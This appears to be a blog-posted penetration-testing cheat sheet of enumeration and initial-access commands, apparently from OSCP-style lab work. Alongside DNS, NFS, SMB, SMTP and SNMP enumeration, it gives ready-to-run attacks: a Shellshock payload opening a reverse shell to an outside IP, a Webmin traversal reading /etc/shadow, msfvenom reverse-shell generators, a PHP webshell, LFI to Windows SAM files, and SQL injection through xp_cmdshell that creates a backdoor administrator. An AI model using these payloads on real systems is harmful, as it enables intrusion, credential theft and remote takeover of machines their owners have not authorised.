Enumeration and Gain access
#DNS Zone Transfers//Windows DNS zone transfer
nslookup -> set type=any -> ls -d blah.com
//Linux DNS zone transfer
dig axfr blah.com @ns1.blah.com
host -t ns megacorpone.com
host -l megacorpone.com ns2.megacorpone.com
#DNS Tools
//Dnsrecon DNS Brute Force
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
//Dnsrecon DNS List of megacorp
dnsrecon -d megacorpone.com -t axfr
dnsrecon -d megacorpone.com
dnsrecon -r 192.168.13.200-192.168.13.254 -n 192.168.13.220 //reverse lookup. dns server is -n
dnsrecon -d acme.local -D /usr/share/wordlist/dns/dnsrecon.txt -t brt //bruteforce the acme.local domain for domains and subdomains
dnsrecon -a -d thinc.local -n 192.168.13.220 ## trying zone transfer. -n is the DNS server
#NFS (Network File System) Enumeration
//Show Mountable NFS Shares
nmap -sV --script=nfs-* $ip
nmap -sV --script=nfs-showmount $ip
//Enumerate NFS shares
showmount -e 192.168.56.103
//Mount NTFS share
mount -t nfs 192.168.1.72:/home/vulnix /tmp/mnt -nolock
#SMB Enumeration
//SMB Enumeration Tools
nmblookup -A $ip
smbclient //MOUNT/share -I $ip -N
rpcclient -U "" $ip
enum4linux -a $ip
//Accessing Share folder
smbclient \\\\10.11.1.31\\wwwroot -u "" -p
smbclient //10.11.1.136/Bob\ Share
#SMTP Enumeration - Mail Severs
//Verify SMTP port using Netcat
nc -nv $ip 25
//Enumration username through VRFY
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.22
#SNMP Enumeration
//SNMP Dictionary attack
root@kali:~# echo public > community
root@kali:~# echo private >> community
root@kali:~# echo manager >> community
root@kali:~# for ip in $(seq 1 254);do echo 10.11.1.$ip;done > ips
root@kali:~# onesixtyone -c community -i ips
#Webmin
//Test to see if webmin is running as root by grabbing /etc/shadow
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
#Shellshock
curl -H "User-Agent: () {:;}; /bin/bash -c 'bash -I >& /dev/tcp/10.11.0.169/1337 0>&1'" http://10.11.1.111/cgi-bin/admin.cgi -s
#Webdav with IIS6.0 Bypassing
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali machine> LPORT=8443 -f asp > reverse.asp
cadaver 10.12.23.11
dav:/> put reverse.asp reverse.txt
dav:/> copy reverse.txt reverse.asp;.txt
Now reverse.asp will be located on web server
Churrasco exploitation (https://www.exploit-db.com/exploits/6705/) for Win2k3+IIS6.0 could be used for Priv Esc
#LFI to SAM/SYSTEM files
=../../../../../../WINDOWS/repair/sam
=../../../../../../WINDOWS/repair/system
samdump2 SYSTEM SAM > hashes.txt
#OS-Shell via SQLMap
sqlmap -r req.txt -p type_id --os-shell
#SYSTEM Shell via MSSQL Payload (Require MSSQL's SA cred)
msf> use exploit/windows/mssql/mssql_payload
#Webshell
Kali: cd /usr/share/webshells/
PHP Shell <?php echo passthru("bash -I >& /dev/tcp/10.11.0.169/8443 0>&1");?>
JSP Shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.169 LPORT=443 -f raw > shell.jsp
Tomcat msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
#HTTP Enumeration
//Search for folders with gobuster:
gobuster -w /usr/share/seclists/Discovery/Web_Content/big.txt -u $ip -t 100
//Nikto
nikto -h $ip
For unauthenticated
curl -d "id=1';exec+master..xp_cmdshell+'net+user+eviladmin+P@ssw0rd+/add'--" http://10.11.1.100/news.asp
curl -d "id=1';exec+master..xp_cmdshell+'net+localgroup+administrators+eviladmin+/add'--" http://10.11.1.100/news.asp
ไม่มีความคิดเห็น:
แสดงความคิดเห็น